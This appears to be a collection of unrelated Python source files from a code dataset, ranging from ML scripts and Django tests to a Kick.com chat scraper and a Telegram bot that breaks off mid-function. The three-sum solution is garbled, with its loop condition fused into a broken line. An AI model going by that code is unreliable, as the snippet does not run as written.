'baset')*(31/50)\n \n RX4 = None\n \n R_G.append(RX1)\n \n R_B.append(RX3)\n\n \n else:\n \n # after 1H\n\n LX0 = LGHPLC0\n \n LX1 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'subst')*2.1\n \n LX2 = None\n \n LX3 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'baset')*1\n \n LX4 = None\n \n L_G.append(LX1)\n \n L_B.append(LX3)\n \n \n RX0 = RGHPLC0\n \n RX1 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'subst')*(62/30)\n \n RX2 = None\n \n RX3 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'baset')*(31/50)\n \n RX4 = None\n \n R_G.append(RX1)\n \n R_B.append(RX3)\n \n \n # X4_calculate\n \n files = os.listdir()\n \n file_exit_L = 0\n \n file_exit_R = 0\n \n for i in range(10):\n \n if file_exit_L == 0:\n \n L_file_T_minus_1 = str(now_time - 3600 - i*60) + '_left_control.jpg'\n \n \n if L_file_T_minus_1 in files:\n \n file_exit_L = 1\n \n LX3_T_minus_1 = rt_counter_reading(cnn_net, L_file_T_minus_1, 'baset')*1\n \n LX4 = LX3 - LX3_T_minus_1\n \n if file_exit_R == 0:\n \n R_file_T_minus_1 = str(now_time - 3600 - i*60) + '_right_control.jpg'\n \n if R_file_T_minus_1 in files:\n \n file_exit_R = 1\n \n RX3_T_minus_1 = rt_counter_reading(cnn_net, R_file_T_minus_1, 'baset')*(31/50)\n \n RX4 = RX3 - RX3_T_minus_1\n \n # control \n\n if begin_feed_R == 0:\n \n if (now_time - start_time) > 4000:\n\n tmp_xx = np.array([[RX0,ROD0,RX3,RX4]])\n\n tmp_xx = core_2_minMax_input.transform(tmp_xx)\n \n tmp_xx = torch.Tensor(tmp_xx)\n \n tmp_xx = torch.unsqueeze(tmp_xx,dim=1)\n \n yy = core_net2(tmp_xx).detach().numpy()\n \n RRX4 = core_2_minMax_output.inverse_transform(np.array([[yy[0,0,0],yy[0,0,1]]]))[0,0]\n \n if RRX4 < 15:\n \n begin_feed_R = 1\n \n control_panel_location(handle_right)\n \n function_click(handle_right, 'subst')\n \n number_panel(handle_right, '10')\n \n if begin_feed_R == 1:\n 
\n if (now_time - start_time)%600 == 0:\n \n RX0 = RX0\n \n RX1 = RX1\n \n RX2 = RX1 + (Now_G_R_Rate*5)*(62/30)\n \n RX3 = RX3\n \n RX4 = RX4\n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-1) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n aaa = opt_R()\n \n Now_G_R_Rate = aaa[0][0]\n \n control_panel_location(handle_right)\n \n function_click(handle_right, 'subst')\n \n number_panel(handle_right,str(Now_G_R_Rate)[0:4])\n\n\n\n \n if begin_feed_L == 0:\n \n if (now_time - start_time) > 4000:\n \n tmp_xx = np.array([[LX0,LOD0,LX3,LX4]])\n \n tmp_xx = core_2_minMax_input.transform(tmp_xx)\n \n tmp_xx = torch.Tensor(tmp_xx)\n \n tmp_xx = torch.unsqueeze(tmp_xx,dim=1)\n \n yy = core_net2(tmp_xx).detach().numpy()\n\n LLX4 = core_2_minMax_output.inverse_transform(np.array([[yy[0,0,0],yy[0,0,1]]]))[0,0]\n \n if LLX4 < 15:\n \n begin_feed_L = 1\n \n control_panel_location(handle_left)\n \n function_click(handle_left, 'subst')\n \n number_panel(handle_left, '10')\n \n if begin_feed_L == 1:\n \n if (now_time - start_time) % (time_resoliton*60) == 0:\n \n LX0 = LX0\n \n LX1 = LX1\n \n LX2 = LX1 + (Now_G_L_Rate*5)*2.1\n \n LX3 = LX3\n \n LX4 = LX4\n \n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-1) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n aaa = opt_L()\n \n Now_G_L_Rate = aaa[0][0]\n \n control_panel_location(handle_left)\n \n function_click(handle_left, 'subst')\n \n number_panel(handle_left,str(Now_G_L_Rate)[0:4])\n \n \n\n\n\ndata_loading()\n\nmain(44,44,0.290,0.242)","repo_name":"JChonpca/AI_Fed_Batch_Fermentation","sub_path":"ai-fb.py","file_name":"ai-fb.py","file_ext":"py","file_size_in_byte":30463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40561039848","text":"# This file is to test the performance of the saved model\n\n\n# Start timer\nimport time\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\nstartTime = current_milli_time()\n\n\n\n# Load the dataset\nimport pandas\nimport numpy as np\n\ndataset = pandas.read_csv('dataset/dataset.csv')\n\n\n\n# Split Data\nfrom sklearn.model_selection import train_test_split\narray = dataset.values\nX = array[:,0:15]\nY = array[:,15]\nval_size = 0.2\nseed=7\nX_train, X_val, Y_train, Y_val = train_test_split(X,Y, test_size=val_size, random_state=seed)\n\n\n\nimport joblib\nmodel = joblib.load('final_models/decision_tree.pkl')\n# Model Evaluation\nfrom sklearn import metrics\npredictions = model.predict(X_val)\nprint(metrics.accuracy_score(Y_val, predictions))\nprint(metrics.confusion_matrix(Y_val, predictions))\nprint(metrics.classification_report(Y_val, predictions))","repo_name":"rayyue300/phishing-webpage-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70742494249","text":"import re\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.gis.geos import Point\nfrom django.core.management import BaseCommand\n\nfrom accounts.models import get_account\n\nUser = get_user_model()\n\n\nclass Command(BaseCommand):\n \"\"\"Set coordinates value, from latitude and longitude values\"\"\"\n args = ''\n help = 'Set coordinates with provided lat and long values'\n\n def handle(self, *args, **options):\n # first, ask for user identifier, and get it\n while True:\n identifier = input('Please indicate id or email of user to handle')\n if identifier.isnumeric() or 
re.match(r'.{2,}@.{2,}\\..{2,}', identifier):\n break\n else:\n self.stdout.write('Wrong value. Please, provide id or email of user.\\n')\n self.stdout.flush()\n if identifier.isnumeric():\n try:\n user = User.objects.get(id=identifier)\n except User.DoesNotExist:\n self.stdout.write('No User with provided id')\n exit()\n else:\n try:\n user = User.objects.get(email=identifier)\n except User.DoesNotExist:\n self.stdout.write('No User with provided email')\n exit()\n # second, ask for coordinates\n latitude = None\n while latitude is None:\n try:\n latitude = float(input('Please, provide latitude: '))\n except ValueError:\n self.stdout.write('Please, provide a valid float number\\n')\n longitude = None\n while longitude is None:\n try:\n longitude = float(input('Please, provide longitude: '))\n except ValueError:\n self.stdout.write('Please, provide a valid float number\\n')\n\n account = get_account(user)\n account.coordinates = Point(longitude, latitude, srid=4326)\n account.save()\n self.stdout.write('Coordinates were stored successfully')\n","repo_name":"iamvane/nabi_api_django","sub_path":"accounts/management/commands/set_coordinates.py","file_name":"set_coordinates.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"74131907369","text":"from sklearn import svm\r\nimport numpy as np\r\nimport os, pickle\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfeatures = np.load('featuredExtract.npy')\r\n\r\ny_train = np.load('y_train.npy')\r\ny_test = np.load('y_test.npy')\r\n\r\nx_train = features[:30]\r\nx_test = features[30:]\r\n\r\n# clf = svm.SVC(gamma='auto')\r\n\r\nclf = LinearSVC(C=1.0, class_weight=None, dual=True, fit_intercept=True,\r\n intercept_scaling=1, loss='squared_hinge', max_iter=10000,\r\n multi_class='ovr', penalty='l2', random_state=0, tol=1e-05, verbose=0)\r\nclf.fit(x_train, y_train)\r\nprint(clf.coef_)\r\nprint(clf.intercept_)\r\npickle.dump(clf,open('modelSVM.pkl','wb'))\r\n\r\ntest_predict_Y= clf.predict(x_test)\r\nprint(test_predict_Y)\r\nprint('Accuracy: {}'.format(accuracy_score(y_test,test_predict_Y)))\r\n# print(result)\r\n# pickle.dump(result,open('result.pkl','wb'))\r\n# clf = pickle.load(open('modelSVM.pkl','rb'))\r\n","repo_name":"ducanhvina17/SVM","sub_path":"SVM_classification.py","file_name":"SVM_classification.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"31626175298","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nn = int(input())\na = tuple(map(int,input().split()))\n\nif(n <= 3):\n print(max(a))\n exit()\n\nleft = [0] * (n+1)\nright = [0] * (n+1)\n\nleft[1] = a[0]\nleft[2] = max(a[0],a[1])\nfor i in range(3,n+1):\n if(i%2==0):\n left[i] = max(left[i-3] + max(a[i-2], a[i-1]),\n left[i-2] + a[i-1])\n else:\n left[i] = left[i-2] + a[i-1]\n\nright[-2] = a[-1]\nright[-3] = max(a[-1],a[-2])\nfor i in range(n-3,-1,-1):\n if((n-i)%2==0):\n right[i] = max(right[i+3] + max(a[i+1], a[i]),\n right[i+2] + a[i])\n else:\n right[i] = right[i+2] + a[i]\n\nans = left[-2]\nfor i in range(0,n-1 ):\n ans = max(ans, left[i] + right[i+2])\n\nif(n%2==0):\n print(left[-1])\nelse:\n 
print(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc162/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8704800971","text":"from kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.textinput import TextInput\n\n\nclass LaborantScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n gridlayout = GridLayout(cols=3, row_force_default=True, row_default_height=40, col_default_width = 200)\n gridlayout.add_widget(Label(text=\"Рабочее место лаборанта\",size_hint=[1, 0.1]))\n gridlayout.add_widget((Button(text='Заявка на изменение расписания',on_click= self.BUTTON_Message, background_color=[0, 0, 1, 0])))\n gridlayout.add_widget((Button(text='Перенести пару', on_click= self.BUTTON_Message, background_color=[0, 0, 1, 0])))\n gridlayout.add_widget((Button(text='Заменить преподавателя', on_click= self.BUTTON_Message, background_color=[0, 0, 1, 0])))\n self.add_widget(gridlayout)\n\n bottommenu = BoxLayout(orientation = 'horizontal',size_hint=(1, .15))\n bottommenu.add_widget(Button(text='Выход', on_press=self.BUTTON_exit, size_hint=(.5, 1)))\n bottommenu.add_widget((Button(text='', disabled = True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n bottommenu.add_widget((Button(text='', disabled=True, size_hint=(.5, 1))))\n self.add_widget(bottommenu)\n\n def BUTTON_Message(self,*args):\n popup = Popup(title='Сообщение',content=TextInput(text=('Данный функционал в разработке'), multiline=True),size_hint=(None, None), size=(200, 200))\n popup.open()\n\n def BUTTON_exit(self,*args):\n self.manager.transition.direction = 'right'\n self.manager.current = 'LOGIN_screen'","repo_name":"p1zza/Timesheet_Otradnov","sub_path":"Forms/LaborantScreen.py","file_name":"LaborantScreen.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40446112327","text":"# *****************************************************\n#\n# Program Author: Frances Zhao\n# Completion Date: May 20 2021\n# Program Name: lesson19_6.py\n# Description: Write a function to “glue” two strings together. 
Write another function which reverses a string.\n# Now use those two functions to create a machine (third function) that glues together first two strings,\n# reverses the result, and then glues on a third string.\n#\n# *****************************************************\n# first function: glues two strings together\ndef glue_strings(string1, string2):\n glued = string1+string2\n return glued\n\n\n# second function: reverses a string\ndef reverse_string(string):\n return string[::-1]\n\n\n# third function: glues two strings, reverses it, and glues a third string\ndef glue_reverse(string1, string2, string3):\n glue = str()\n glue = string1 + string2\n reverse = glue[::-1]\n return reverse + string3\n\n# variable declaration\nstring = \"puppy\"\nstring1 = \"happy\"\nstring2 = \"kitten\"\nstring3 = \"rainbows\"\n\n# testing the three functions:\nprint(glue_strings(string1, string2))\nprint(reverse_string(string))\nprint(glue_reverse(string1, string2, string3))","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 19/lesson19_6.py","file_name":"lesson19_6.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29846670422","text":"#! /usr/bin/python\nimport argparse\nimport asyncio\n\nimport aiohttp\nimport orjson\nimport redis.asyncio as redis\nfrom aiohttp import ClientConnectorError\nfrom playwright.async_api import async_playwright\nfrom rich import print\nfrom selectolax.parser import HTMLParser\n\n# Kick.com API and WebSocket URLs\nBASE_URL = \"https://kick.com/api/v2/channels\"\nWS_URL = \"wss://ws-us2.pusher.com/app/eb1d5f283081a78b932c?protocol=7&client=js&version=7.6.0&flash=false\"\n\n# Create a Redis connection\ntry:\n\tr = redis.Redis(host='localhost', port=6379)\nexcept Exception as e:\n\tprint(f\"An error occurred when connecting to Redis: {e}\")\n\ndef parse_arguments():\n\tparser = argparse.ArgumentParser(description=\"Kick Chat Listener\")\n\tparser.add_argument(\"--channel\", type=str, required=True, help=\"Kick channel name\")\n\targs = parser.parse_args()\n\treturn args.channel\n\nasync def get_chatroom_id(channel_name: str):\n\turl = f\"{BASE_URL}/{channel_name}\"\n\tasync with async_playwright() as p:\n\t\ttry:\n\t\t\t# Launch a Chromium browser to bypass Cloudflare\n\t\t\tbrowser = await p.chromium.launch(headless=False)\n\t\t\tpage = await browser.new_page()\n\t\t\tawait page.goto(url)\n\t\t\thtml = HTMLParser(await page.content())\n\t\t\tawait browser.close()\n\n\t\t\t# Get the chatroom ID from the JSON\n\t\t\tchannel_data = orjson.loads(html.css_first(\"body\").text())\n\t\t\tchannel_id = channel_data[\"chatroom\"][\"id\"]\n\t\t\treturn channel_id\n\t\texcept Exception as e:\n\t\t\tprint(f\"An error occurred when getting chatroom id: {e}\")\n\t\t\treturn None\n\nasync def connect_to_kick_chat(chatroom_id: int, channel_name: str):\n\tasync with aiohttp.ClientSession() as session:\n\t\ttry:\n\t\t\tasync with session.ws_connect(WS_URL) as ws:\n\t\t\t\tprint(f\"Connected to {channel_name} chat, listening for messages...\")\n\t\t\t\tchatroom_subscribe_message = {\n\t\t\t\t\t\"event\": \"pusher:subscribe\",\n\t\t\t\t\t\"data\": {\"auth\": \"\", \"channel\": f\"chatrooms.{chatroom_id}.v2\"}}\n\t\t\t\tawait ws.send_str(orjson.dumps(chatroom_subscribe_message).decode())\n\n\t\t\t\tchannel_subscribe_message = {\n\t\t\t\t\t\"event\": \"pusher:subscribe\",\n\t\t\t\t\t\"data\": {\"auth\": \"\", \"channel\": f\"channel.{chatroom_id}\"}}\n\t\t\t\tawait 
ws.send_str(orjson.dumps(channel_subscribe_message).decode())\n\n\t\t\t\tasync for msg in ws:\n\t\t\t\t\tdata = orjson.loads(msg.data)\n\t\t\t\t\tif data.get(\"event\") == \"App\\\\Events\\\\ChatMessageEvent\":\n\t\t\t\t\t\tmessage_data = orjson.loads(data[\"data\"])\n\t\t\t\t\t\tmessage = {\n\t\t\t\t\t\t\t\"platform\": \"Kick\",\n\t\t\t\t\t\t\t\"channel\": data[\"channel\"],\n\t\t\t\t\t\t\t\"channel_name\": channel_name,\n\t\t\t\t\t\t\t\"message_id\": message_data[\"id\"],\n\t\t\t\t\t\t\t\"chatroom_id\": message_data[\"chatroom_id\"],\n\t\t\t\t\t\t\t\"content\": message_data[\"content\"],\n\t\t\t\t\t\t\t\"message_type\": message_data[\"type\"],\n\t\t\t\t\t\t\t\"created_at\": message_data[\"created_at\"],\n\t\t\t\t\t\t\t\"sender_id\": message_data[\"sender\"][\"id\"],\n\t\t\t\t\t\t\t\"username\": message_data[\"sender\"][\"username\"],\n\t\t\t\t\t\t\t\"slug\": message_data[\"sender\"][\"slug\"],\n\t\t\t\t\t\t\t\"color\": message_data[\"sender\"][\"identity\"][\"color\"],\n\t\t\t\t\t\t\t\"badges\": message_data[\"sender\"][\"identity\"][\"badges\"],\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\t# Publish data to the Redis channel\n\t\t\t\t\t\tawait r.publish(f'{channel_name}_chat', orjson.dumps(message))\n\t\texcept ClientConnectorError as e:\n\t\t\tprint(f\"Could not connect to the WebSocket: {e}\")\n\t\texcept Exception as e:\n\t\t\tprint(f\"An unexpected error occurred: {e}\")\n\nasync def main(channel_name):\n\tchatroom_id = await get_chatroom_id(channel_name)\n\tif chatroom_id is not None:\n\t\tprint(f\"Chatroom ID: {chatroom_id}\")\n\t\tawait connect_to_kick_chat(chatroom_id, channel_name)\n\nif __name__ == \"__main__\":\n\tchannel_name = parse_arguments()\n\tasyncio.run(main(channel_name))\n","repo_name":"karlhendrik/openprofile-analytics","sub_path":"services/kick-chat-agent/kick_agent.py","file_name":"kick_agent.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12345358201","text":"import json\n\nfrom rest_framework import status\nfrom rest_framework.test import APITransactionTestCase\n\nfrom api.models import Tag\n\n\nclass TagsAPITests(APITransactionTestCase):\n reset_sequences = True\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.tags_endpoint = '/api/tags/'\n cls.test_tag_url = cls.tags_endpoint + '1/'\n cls.not_existing_tag = cls.tags_endpoint + '2/'\n\n cls.empty_tags_list = []\n\n cls.test_tag = {\n \"name\": \"Завтрак\",\n \"color\": \"#E26C2D\",\n \"slug\": \"breakfast\"\n }\n\n cls.not_empty_tags_list = [\n {\n \"id\": 1,\n \"name\": \"Завтрак\",\n \"color\": \"#E26C2D\",\n \"slug\": \"breakfast\"\n }\n ]\n\n cls.tag_breakfast_data = cls.not_empty_tags_list[0]\n\n def create_tag(self):\n Tag.objects.create(\n name=self.test_tag['name'],\n color=self.test_tag['color'],\n slug=self.test_tag['slug']\n )\n\n def test_empty_tags_list(self):\n response = self.client.get(self.tags_endpoint)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n json.loads(response.content),\n self.empty_tags_list\n )\n\n def test_not_empty_tags_list(self):\n self.create_tag()\n response = self.client.get(self.tags_endpoint)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n json.loads(response.content),\n self.not_empty_tags_list\n )\n\n def test_get_test_tag(self):\n self.create_tag()\n response = self.client.get(self.test_tag_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n 
json.loads(response.content),\n            self.tag_breakfast_data\n        )\n\n    def test_not_existing_tag_returns_404(self):\n        response = self.client.get(self.not_existing_tag)\n        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n","repo_name":"aybor/foodgram-project-react","sub_path":"backend/api/tests/test_tags.py","file_name":"test_tags.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352860817","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\nPrint Binary Tree in Vertical Order OR\nPrint the Binary Tree in Vertical Order Path OR\nVertical order traversal of a Binary Tree. \nFind Vertical Sum of given Binary Tree\n'''\n# http://javabypatel.blogspot.jp/2015/10/print-binary-tree-in-vertical-order.html\n\nfrom collections import defaultdict\n\nclass Node(object):\n    def __init__(self, val, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n\ndef vertical_order(root, level, record):\n    record[level].append(root)\n    if root.left != None:\n        vertical_order(root.left, level-1, record)\n    if root.right != None:\n        vertical_order(root.right, level+1, record)\n\ndef echo(record):\n    for level, lst in record.items():\n        print(level) \n        for obj in lst:\n            print(' ', obj.val)\n\ntree = Node(1, Node(2, Node(4), Node(5)), Node(3, Node(6), Node(7)))\nrecord = defaultdict(list)\nvertical_order(tree, 0, record)\necho(record)\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"tree/vertical_order_of_a_tree.py","file_name":"vertical_order_of_a_tree.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"36018315797","text":"pesel = \"55030101193\"\nweights = [1, 3, 7, 9, 1, 3, 7, 9, 1, 3]\n\nlength = len(weights)\n\nsum = 0\nfor i in range(length):\n    sum += int(pesel[i]) * weights[i]\n\nchecksum = (10 - sum % 10) % 10  # wrap 10 -> 0: the PESEL check digit is 0 when the weighted sum already ends in 0\nprint(checksum)\n","repo_name":"rajchelm/python-academy","sub_path":"basics/loops_and_conditions/pesel_calculation.py","file_name":"pesel_calculation.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19450565488","text":"from PySide6.QtWidgets import QLayoutItem\n\nfrom declare_foundation.components import BaseComponent as _Base\n\n\nclass BaseComponent(_Base):\n    \n    def _enter_extra(self):\n        if isinstance(self, QLayoutItem):\n            # NOTE: when self is a QLayoutItem instance, the parent component must\n            # add it immediately during __enter__ (the parent calls the setLayout\n            # method). Otherwise the Application shows a small blank window at\n            # startup (that window is self before any parent is assigned); it only\n            # disappears, with a flash, once the parent adds it, leaving the user\n            # feeling that \"some window just flashed by\".\n            from ..core import parent\n            parent_com = parent.represents\n            assert parent_com is not None\n            parent_com.setLayout(self)\n    \n    def _exit_extra(self, child_com, parent_com):\n        # PS: self is child_com, they are the same object\n        if isinstance(self, QLayoutItem):\n            return\n        if parent_com is not None:\n            if isinstance(parent_com, QLayoutItem):\n                parent_com.addWidget(child_com)\n            else:\n                child_com.setParent(parent_com)\n        if hasattr(self, 'show'):\n            self.show()\n","repo_name":"likianta/declare-qt","sub_path":"declare_qt/components/base_component.py","file_name":"base_component.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22344276456","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on %(date)s\n\n@author: %(username)s\n\"\"\"\n\"\"\"\nCreated on %(data)s\n@title: Robins Magical Module\n@description: Module with generally useful functions.\n@author: RD Beerman\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\n    Gaussian takes array and maxval to calculate array with gaussian function\n    width is the standard deviation\n\"\"\"\ndef gaussian(array,maxval,center,width): \n    arrayout = []\n    for i in range(0,len(array)):\n        value = array[i]\n        val = maxval*np.exp((-((value-center)**2)/(2*width**2)))\n        arrayout.append(val)\n    return arrayout\n\n\"\"\"\n    Same as gaussian but plots it with arguments for label, color and linestyle\n\"\"\"\ndef gaussianplot(array,maxval,center,width,label,color,linestyle): \n    arrayout = []\n    for i in range(0,len(array)):\n        value = array[i]\n        val = maxval*np.exp((-((value-center)**2)/(2*width**2)))\n        arrayout.append(val)\n    plt.plot(array,arrayout,label=label,color=color,linestyle=linestyle)\n    plt.legend()\n    return\n\n\"\"\"\n    plot plots x and y automatically with labels\n\"\"\"\ndef plot(x,y,label,markertype,markersize,ylabel,xlabel):\n    plt.plot(x,y,label=label,marker=markertype,markersize=markersize)\n    plt.ylabel(ylabel)\n    plt.xlabel(xlabel)\n    plt.legend()\n    plt.grid()\n    return\n\"\"\"\n    Plots a polynomial of the given order with no extrapolation \n    (between 1st and last value) with arguments for linestyle, label and color\n\"\"\"\ndef plotpolyfit(xarray,yarray,order,label,linestyle,color):\n    trendlineparams = np.polyfit(xarray,yarray,order) #Find best fitting line parameters\n    trendline = np.poly1d(trendlineparams)\n    xtrend = np.linspace(xarray[0],xarray[len(xarray)-1])\n    plt.plot(xtrend,trendline(xtrend),label=label,linestyle=linestyle,color=color)\n    plt.legend()\n    return\n","repo_name":"rdbeerman/rmm_python","sub_path":"rmm.py","file_name":"rmm.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73431820647","text":"\"\"\"\nPseudocode\nsort the array\nloop through the elements of the array; for each element create a left pointer one past\nits index and a right pointer at the end, and check whether the three values sum to 0;\nif the sum is greater than 0 move the right pointer left, and if it is less than 0 increment the left pointer\n\n\"\"\"\n\nclass Solution(object):\n    def threeSum(self, nums):\n        solList = set()\n        nums = sorted(nums)\n        print(nums)\n        for i in range(len(nums)):\n            j = i+1\n            k = len(nums)-1\n            while k>j and j 0:\n                    k-=1\n                else:\n                    j+=1\n\n        return solList","repo_name":"pbairol/leetcode","sub_path":"Three Sum 
15/three_sum_1.py","file_name":"three_sum_1.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19481304075","text":"import logging\nimport asyncio\nimport random\nimport sqlite3\nimport string\n\n#aiogram и всё утилиты для коректной работы с Telegram API\nfrom aiogram import Bot, types\nfrom aiogram.utils import executor\nfrom aiogram.utils.emoji import emojize\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.types.message import ContentType\nfrom aiogram.utils.markdown import text, bold, italic, code, pre\nfrom aiogram.types import ParseMode, InputMediaPhoto, InputMediaVideo, ChatActions\nfrom aiogram.types import ReplyKeyboardRemove,ReplyKeyboardMarkup, KeyboardButton, InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nimport aiogram.utils.exceptions\nfrom aiogram.types.message import ContentTypes\n\n#конфиг с настройками\nimport config\nfrom database import dbworker\n\n\n#инициализируем базу данных\ndb = dbworker('db dumb1.db')\nprint('[i] Bot Succes')\n\n#инициализируем бота\nbot = Bot(token=config.TOKEN)\ndp = Dispatcher(bot,storage=MemoryStorage())\n\n#логирование\nlogging.basicConfig(filename=\"all_log.log\", level=logging.INFO, format='%(asctime)s - %(levelname)s -%(message)s')\nwarning_log = logging.getLogger(\"warning_log\")\nwarning_log.setLevel(logging.WARNING)\n\nfh = logging.FileHandler(\"warning_log.log\")\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\n\n\nwarning_log.addHandler(fh)\n\n#хендлер команды /start\n@dp.message_handler(commands=['start'],state='*')\nasync def start(message : types.Message, state: FSMContext):\n \n await state.finish()\n\n button_search = KeyboardButton('Cari pasangan🔍')\n\n button_info_project = KeyboardButton('Info')\n\n ranked = KeyboardButton('Chat Teratas')\n\n count_users = KeyboardButton('Total user👤')\n\n mark_menu = ReplyKeyboardMarkup()\n\n mark_menu.add(button_search,button_info_project,ranked,count_users)\n\n await bot.send_message(message.chat.id,'👋 Hallo!\\n\\nSaya bot mencari teman untuk kamu\\nSaya harap kamu bisa menemukan teman atau pasanganmu :)\\n\\nBot ini Belum bisa mengirim Foto, video, voice hanya bisa mengirim stiker:)\\n\\nJangan Lupa untuk bergabung ke grup t.me/caritemanh',reply_markup=mark_menu)\n\n@dp.message_handler(lambda message : message.text == 'Total user👤')\nasync def count_users(message : types.Message):\n await message.answer(f'Jumlah pengguna saat ini {int(db.count_user() * 1.5)} orang👤')\n\n@dp.message_handler(lambda message : message.text == 'Info' or message.text == 'Proyek' or message.text == 'Все ссылки на нас' or message.text == 'Pembuat bot👤',state='*')\nasync def about_project(message : types.Message):\n if message.text == 'Info':\n\n for_developers = KeyboardButton('Pembuat bot👤')\n\n back = KeyboardButton('Back')\n\n rules = KeyboardButton('Rules bot📌')\n\n mark_menu = ReplyKeyboardMarkup()\n\n mark_menu.add(for_developers,rules,back)\n\n await bot.send_message(message.chat.id,'Semua informasi ada disini👇',reply_markup=mark_menu)\n\n elif message.text == 'Pembuat bot👤':\n await message.answer('Cie Kepo yaa😂😂\\nRAHASIA')\n\n@dp.message_handler(commands=['rules'],state='*')\n@dp.message_handler(lambda message : message.text == 'Rules bot📌')\nasync def rules(message : 
types.Message):\n    await message.answer('''📌Aturan di bot @chatjomblohalu2_bot\\n1. Tidak boleh share yang berbau pornografi!\\n2. Wajib join grup @caritemanh\\n3. Berkata sopan!\\n4. Bijak dalam menggunakan bot\\n\\n''')\n\n@dp.message_handler(commands=['search'],state='*')\n@dp.message_handler(lambda message: message.text == 'Cari pasangan🔍',state='*')\nasync def search(message : types.Message):\n    try:\n        if(not db.user_exists(message.from_user.id)): #if no user with this telegram id was found\n            db.add_user(message.from_user.username,message.from_user.id) #add the user to the db table\n\n        male = KeyboardButton('Laki-Laki')\n\n        wooman = KeyboardButton('Perempuan')\n\n        back = KeyboardButton('Kembali')\n\n        sex_menu = ReplyKeyboardMarkup(one_time_keyboard=True)\n\n        sex_menu.add(male,wooman,back)\n\n        await message.answer('Pilih jenis kelamin pasangan Anda!\\nSiapa yang kamu cari?',reply_markup=sex_menu)\n    except Exception as e:\n        warning_log.warning(e)\n\n\n@dp.message_handler(lambda message : message.text == 'Chat Teratas')\nasync def ranked(message : types.Message, state: FSMContext):\n    ''' Function that prints out the rating '''\n    try:\n        final_top = ''\n        top_count = 0\n        for i in db.top_rating():\n            for d in i:\n                top_count +=1\n                if 